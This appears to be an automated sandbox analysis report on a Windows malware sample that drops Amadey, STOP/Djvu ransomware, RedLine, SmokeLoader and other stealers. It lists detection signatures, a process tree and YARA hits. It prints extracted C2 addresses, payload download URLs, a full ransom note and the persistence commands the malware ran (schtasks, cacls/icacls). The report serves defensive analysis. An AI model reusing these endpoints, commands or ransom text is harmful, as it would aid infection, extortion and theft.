Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:	file.exe
Analysis ID:	1281402
MD5:	b44c8fb3583e3e3c9324a535e356a8d0
SHA1:	846537acc6e4d12c1e6dee35e6725adebd852e10
SHA256:	000516c28c42ecfae446be04b493a3110b5fc044de5bf89e4d6fbda5d2c2ee84
Tags:	exe
Infos:

Detection

Amadey, Djvu, Fabookie, LummaC Stealer, RedLine, SmokeLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected RedLine Stealer

Yara detected LummaC Stealer

Yara detected Amadeys stealer DLL

Detected unpacking (overwrites its own PE header)

Yara detected SmokeLoader

Yara detected Amadey bot

System process connects to network (likely due to code injection or exploit)

Detected unpacking (changes PE section rights)

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected unpacking (creates a PE file in dynamic memory)

Snort IDS alert for network traffic

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected Fabookie

Benign windows process drops PE files

Malicious sample detected (through community Yara rule)

Yara detected Djvu Ransomware

Multi AV Scanner detection for dropped file

Maps a DLL or memory area into another process

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Uses known network protocols on non-standard ports

Machine Learning detection for sample

Injects a PE file into a foreign processes

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Contains functionality to inject code into remote processes

Deletes itself after installation

Creates a thread in another existing process (thread injection)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Found many strings related to Crypto-Wallets (likely being stolen)

Sample uses string decryption to hide its real strings

Uses schtasks.exe or at.exe to add and modify task schedules

Checks if the current machine is a virtual machine (disk enumeration)

Tries to harvest and steal browser information (history, passwords, etc)

Sample uses process hollowing technique

Tries to steal Crypto Currency Wallets

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Creates an undocumented autostart registry key

Machine Learning detection for dropped file

C2 URLs / IPs found in malware configuration

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Found evasive API chain (may stop execution after checking a module file name)

Contains functionality to dynamically determine API calls

HTTP GET or POST without a user agent

Downloads executable code via HTTP

Contains long sleeps (>= 3 min)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Drops files with a non-matching file extension (content does not match file extension)

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Checks if the current process is being debugged

PE file contains more sections than normal

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Contains functionality to check if a debugger is running (IsDebuggerPresent)

PE file contains sections with non-standard names

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Yara detected Credential Stealer

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to call native functions

Found dropped PE file which has not been started or loaded

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Connects to many different domains

Contains functionality for execution timing, often used to detect debuggers

Creates a DirectInput object (often for capturing keystrokes)

Is looking for software installed on the system

AV process strings found (often used to terminate AV products)

PE file contains an invalid checksum

Extensive use of GetProcAddress (often used to hide API calls)

Uses cacls to modify the permissions of files

Detected TCP or UDP traffic on non-standard ports

Connects to several IPs in different countries

Contains functionality to launch a program with higher privileges

Found evaded block containing many API calls

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Uses Microsoft's Enhanced Cryptographic Provider

Contains functionality to query network adapater information

Classification

Process Tree

System is w10x64

file.exe (PID: 4676 cmdline: C:\Users\user\Desktop\file.exe MD5: B44C8FB3583E3E3C9324A535E356A8D0)

explorer.exe (PID: 3528 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

E640.exe (PID: 7032 cmdline: C:\Users\user\AppData\Local\Temp\E640.exe MD5: 87F85379DFCEA834C8BE87CD575C5E48)

E640.exe (PID: 7100 cmdline: C:\Users\user\AppData\Local\Temp\E640.exe MD5: 87F85379DFCEA834C8BE87CD575C5E48)

617B.exe (PID: 7136 cmdline: C:\Users\user\AppData\Local\Temp\617B.exe MD5: 8471A1A3950D0B7A56B8EC23F8201F97)

617B.exe (PID: 3192 cmdline: C:\Users\user\AppData\Local\Temp\617B.exe MD5: 8471A1A3950D0B7A56B8EC23F8201F97)

5274.exe (PID: 6708 cmdline: C:\Users\user\AppData\Local\Temp\5274.exe MD5: 8471A1A3950D0B7A56B8EC23F8201F97)

5274.exe (PID: 6700 cmdline: C:\Users\user\AppData\Local\Temp\5274.exe MD5: 8471A1A3950D0B7A56B8EC23F8201F97)

icacls.exe (PID: 976 cmdline: icacls "C:\Users\user\AppData\Local\c2de098c-0a25-4298-a1ee-c3ab6cc684bc" /deny *S-1-1-0:(OI)(CI)(DE,DC) MD5: FF0D1D4317A44C951240FAE75075D501)

5274.exe (PID: 5080 cmdline: "C:\Users\user\AppData\Local\Temp\5274.exe" --Admin IsNotAutoStart IsNotTask MD5: 8471A1A3950D0B7A56B8EC23F8201F97)

5274.exe (PID: 2788 cmdline: "C:\Users\user\AppData\Local\Temp\5274.exe" --Admin IsNotAutoStart IsNotTask MD5: 8471A1A3950D0B7A56B8EC23F8201F97)

C474.exe (PID: 6756 cmdline: C:\Users\user\AppData\Local\Temp\C474.exe MD5: 87F85379DFCEA834C8BE87CD575C5E48)

C474.exe (PID: 476 cmdline: C:\Users\user\AppData\Local\Temp\C474.exe MD5: 87F85379DFCEA834C8BE87CD575C5E48)

325D.exe (PID: 6864 cmdline: C:\Users\user\AppData\Local\Temp\325D.exe MD5: 7A366DFF7F1AA77CA3371742D300468B)

96DF.exe (PID: 916 cmdline: C:\Users\user\AppData\Local\Temp\96DF.exe MD5: 9D63567EDC2EAD059C20C4F861E85202)

5274.exe (PID: 7048 cmdline: "C:\Users\user\AppData\Local\c2de098c-0a25-4298-a1ee-c3ab6cc684bc\5274.exe" --AutoStart MD5: 8471A1A3950D0B7A56B8EC23F8201F97)

5274.exe (PID: 6836 cmdline: "C:\Users\user\AppData\Local\c2de098c-0a25-4298-a1ee-c3ab6cc684bc\5274.exe" --AutoStart MD5: 8471A1A3950D0B7A56B8EC23F8201F97)

FE5F.exe (PID: 3132 cmdline: C:\Users\user\AppData\Local\Temp\FE5F.exe MD5: 26115AFB115A50A1CBBC4A4DE8C6816D)

aafg31.exe (PID: 5060 cmdline: "C:\Users\user\AppData\Local\Temp\aafg31.exe" MD5: 179AF079BC710BD2D1EE6DC5B8A0205C)

oldplayer.exe (PID: 1248 cmdline: "C:\Users\user\AppData\Local\Temp\oldplayer.exe" MD5: A64A886A695ED5FB9273E73241FEC2F7)

oneetx.exe (PID: 5148 cmdline: "C:\Users\user\AppData\Local\Temp\207aa4515d\oneetx.exe" MD5: A64A886A695ED5FB9273E73241FEC2F7)

schtasks.exe (PID: 5308 cmdline: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\user\AppData\Local\Temp\207aa4515d\oneetx.exe" /F MD5: 15FF7D8324231381BAD48A052F85DF04)

conhost.exe (PID: 5468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 5472 cmdline: "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "user:N"&&CACLS "oneetx.exe" /P "user:R" /E&&echo Y|CACLS "..\207aa4515d" /P "user:N"&&CACLS "..\207aa4515d" /P "user:R" /E&&Exit MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 5480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 5512 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y" MD5: F3BDBE3BB6F734E357235F4D5898582D)

cacls.exe (PID: 5392 cmdline: CACLS "oneetx.exe" /P "user:N" MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)

cacls.exe (PID: 5416 cmdline: CACLS "oneetx.exe" /P "user:R" /E MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)

cmd.exe (PID: 5440 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y" MD5: F3BDBE3BB6F734E357235F4D5898582D)

cacls.exe (PID: 5744 cmdline: CACLS "..\207aa4515d" /P "user:N" MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)

cacls.exe (PID: 5756 cmdline: CACLS "..\207aa4515d" /P "user:R" /E MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)

XandETC.exe (PID: 5304 cmdline: "C:\Users\user\AppData\Local\Temp\XandETC.exe" MD5: 3006B49F3A30A80BB85074C279ACC7DF)

5274.exe (PID: 5780 cmdline: "C:\Users\user\AppData\Local\c2de098c-0a25-4298-a1ee-c3ab6cc684bc\5274.exe" --AutoStart MD5: 8471A1A3950D0B7A56B8EC23F8201F97)

rfuiwjh (PID: 6860 cmdline: C:\Users\user\AppData\Roaming\rfuiwjh MD5: B44C8FB3583E3E3C9324A535E356A8D0)

5274.exe (PID: 2148 cmdline: C:\Users\user\AppData\Local\c2de098c-0a25-4298-a1ee-c3ab6cc684bc\5274.exe --Task MD5: 8471A1A3950D0B7A56B8EC23F8201F97)

5274.exe (PID: 5428 cmdline: C:\Users\user\AppData\Local\c2de098c-0a25-4298-a1ee-c3ab6cc684bc\5274.exe --Task MD5: 8471A1A3950D0B7A56B8EC23F8201F97)

oneetx.exe (PID: 5524 cmdline: C:\Users\user\AppData\Local\Temp\207aa4515d\oneetx.exe MD5: A64A886A695ED5FB9273E73241FEC2F7)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/ https://blog.cyble.com/2023/01/25/the-rise-of-amadey-bot-a-growing-concern-for-internet-security/ https://blog.minerva-labs.com/underminer-exploit-kit-the-more-you-check-the-more-evasive-you-become	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
STOP, Djvu	STOP Djvu Ransomware it is a ransomware which encrypts user data through AES-256 and adds one of the dozen available extensions as marker to the encrypted file's name. It is not used to encrypt the entire file but only the first 5 MB. In its original version it was able to run offline and, in that case, it used a hard-coded key which could be extracted to decrypt files.	No Attribution	https://angle.ankura.com/post/102het9/the-stop-ransomware-variant https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://cybergeeks.tech/a-detailed-analysis-of-the-stop-djvu-ransomware/ https://cybleinc.com/2021/06/21/djvu-malware-of-stop-ransomware-family-back-with-new-variant/ https://drive.google.com/file/d/1L8mkylrCJyd-817-45RA6gIFCCX4oaOv/view	https://malpedia.caad.fkie.fraunhofer.de/details/win.stop

Name	Description	Attribution	Blogpost URLs	Link
Fabookie	Fabookie is facebook account info stealer.	No Attribution	https://ics-cert.kaspersky.com/publications/reports/2021/12/16/pseudomanuscrypt-a-mass-scale-spyware-attack-campaign/ https://medium.com/@lcam/updates-from-the-maas-new-threats-delivered-through-nullmixer-d45defc260d1	https://malpedia.caad.fkie.fraunhofer.de/details/win.fabookie

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/ https://bartblaze.blogspot.com/2021/06/digital-artists-targeted-in-redline.html	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Name	Description	Attribution	Blogpost URLs	Link
SmokeLoader	The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.	SMOKY SPIDER	http://security.neurolabs.club/2019/08/smokeloaders-hardcoded-domains-sneaky.html http://security.neurolabs.club/2019/10/dynamic-imports-and-working-around.html http://security.neurolabs.club/2020/04/diffing-malware-samples-using-bindiff.html http://security.neurolabs.club/2020/06/unpacking-smokeloader-and.html https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries	https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Malware Configuration

Threatname: Amadey

{"C2 url": "5.42.65.80/8bmeVwqx/index.php", "Version": "3.83", "Install Path": "%TEMP%/207aa4515d/oneetx.exe"}

Threatname: Djvu

{"Download URLs": ["http://colisumy.com/dl/build2.exe", "http://zexeq.com/files/1/build3.exe"], "C2 url": "http://zexeq.com/lancer/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-ujg4QBiBRu\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0751Osie", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\\Windows\\", "F:\\PerfLogs\\", "F:\\ProgramData\\Desktop\\", "F:\\ProgramData\\Microsoft\\", "F:\\Users\\Public\\", "F:\\$Recycle.Bin\\", "F:\\$WINDOWS.~BT\\", "F:\\dell\\", "F:\\Intel\\"], "Public Key": "-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAvDoONy\\/yiJSsSmzcNPQ5\\\\n4mfdn3ve5z8WHdG2MD0O\\/UYFiHHlSvgiajw8DbQTHWj1fBtFSN0SbTDuGsovAb1y\\\\nFliT0GSKV7u4eZeG67QRCjFC0JrD7ZVYtFOWtr+Gk8I1Qjmc\\/8AQeTmMMAr0yiPD\\\\nkBq66Sn\\/7KdbKad3SMq0Lwm5qDE8MZ6GmsXKY\\/QUymzoCMcvzpQtQvrmp9O6gOSt\\\\n8yPM9EOJDSrpH\\/FttbWVqOlGAMBmQ+GjY6h3qJrqPRooPokRkElF5tbRZlhI9I7X\\\\nuKI4r\\/ka2HWWOexKt2oqqQGp5OWWHFq+YfGtd0KhFOj+2a\\/OEDNgU95HTvde1R5B\\\\n3wIDAQAB\\\\n-----END PUBLIC KEY-----"}

Threatname: RedLine

{"C2 url": "51.89.201.49:6932"}

Threatname: SmokeLoader

{"Version": 2022, "C2 list": ["http://bulimu55t.net/", "http://soryytlic4.net/", "http://bukubuka1.net/", "http://novanosa5org.org/", "http://hujukui3.net/", "http://newzelannd66.org/", "http://golilopaster.org/"]}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_LummaCStealer_1	Yara detected LummaC Stealer	Joe Security
dump.pcap	JoeSecurity_Fabookie	Yara detected Fabookie	Joe Security
dump.pcap	JoeSecurity_Amadey	Yara detected Amadey bot	Joe Security
dump.pcap	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
dump.pcap	JoeSecurity_RedLine_1	Yara detected RedLine Stealer	Joe Security
dump.pcap	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x1464b46:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83 0x1468c2a:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83 0x18c2984:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
dump.pcap	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0x146483d:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00 0x1468921:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00 0x18c267b:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00 0x14648ca:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x14689ae:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x18c2708:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x14648ca:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x14689ae:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x18c2708:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x1464bf0:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x1468cd4:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x18c2a2e:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x1465521:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ... 0x1468da2:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ... 0x18c2afc:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
Click to see the 2 entries

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\oldplayer.exe	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
C:\Users\user\AppData\Local\Temp\207aa4515d\oneetx.exe	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
C:\Users\user\AppData\Local\Temp\FE5F.exe	MALWARE_Win_DLInjector04	Detects downloader / injector	ditekSHen	0x424e9b:$s1: Runner 0x425000:$s3: RunOnStartup 0x424eaf:$a1: Antis 0x424edc:$a2: antiVM 0x424ee3:$a3: antiSandbox 0x424eef:$a4: antiDebug 0x424ef9:$a5: antiEmulator 0x424f06:$a6: enablePersistence 0x424f18:$a7: enableFakeError 0x425029:$a8: DetectVirtualMachine 0x42504e:$a9: DetectSandboxie 0x425079:$a10: DetectDebugger 0x425088:$a11: CheckEmulator

Memory Dumps

Source	Rule	Description	Author	Strings
00000025.00000000.678422871.00000000009B1000.00000020.00000001.01000000.00000018.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000000.00000002.572266464.0000000004071000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.572266464.0000000004071000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x3d4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000015.00000002.678970915.0000000003E60000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000015.00000002.678970915.0000000003E60000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x5e4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000011.00000003.657205781.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000011.00000003.657205781.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 8F 88 44 24 2B 88 44 24 2F B0 12 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
00000000.00000002.572111296.0000000002470000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000011.00000002.803593297.0000000003E30000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000011.00000002.803593297.0000000003E30000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000011.00000002.802780710.0000000002568000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x15e8:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
0000001B.00000000.670255361.0000000000961000.00000020.00000001.01000000.00000014.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000018.00000002.672529421.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
00000018.00000002.672529421.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
00000018.00000002.672529421.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
00000000.00000002.572121634.0000000002480000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.572121634.0000000002480000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x7d4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
0000002C.00000002.693972740.00000000041B0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
